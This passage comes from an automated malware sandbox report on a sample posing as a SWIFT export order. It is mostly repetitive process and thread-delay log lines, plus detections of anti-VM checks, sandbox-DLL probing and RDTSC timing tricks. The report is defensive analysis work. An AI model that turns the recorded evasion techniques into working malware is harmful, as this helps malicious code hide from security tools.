          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.2cd9004.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: TT_SWIFT_Export Order_noref S10SMG00318021.exe PID: 3456, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000006B8614 second address: 00000000006B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000006B89AE second address: 00000000006B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -12912720851596678s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1064Thread sleep count: 3989 > 30
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -239828s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1064Thread sleep count: 4346 > 30
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 5664Thread sleep time: -39327s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -239718s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -239609s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -239497s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -239370s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -239263s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -239152s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -239031s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -238921s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -238812s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -238703s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -238593s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -238483s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -238375s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -238265s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -238150s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -238045s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -237937s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -237828s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -237718s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -237609s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -237499s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -237390s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -237281s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -237171s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -237062s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -236952s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -236843s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -236734s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -236625s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -236515s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -236406s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -236296s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -236152s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -236046s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -235937s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -235828s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -235718s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -235609s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -235500s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -235390s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -235281s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -235141s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -235031s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -234913s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -234797s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -234682s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -234553s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -234391s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -234250s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -234140s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -234012s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -233898s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -233750s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -233640s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -233529s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -233421s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -233312s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -233203s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -233093s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -232980s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -232865s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -232687s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -232535s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -232395s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -232268s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -230891s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256Thread sleep time: -230122s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6356Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6236Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340Thread sleep count: 7185 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep count: 1300 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239497
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239370
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239263
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239152
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239031
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238921
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238812
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238703
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238593
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238483
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238375
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238265
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238150
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238045
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237937
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237499
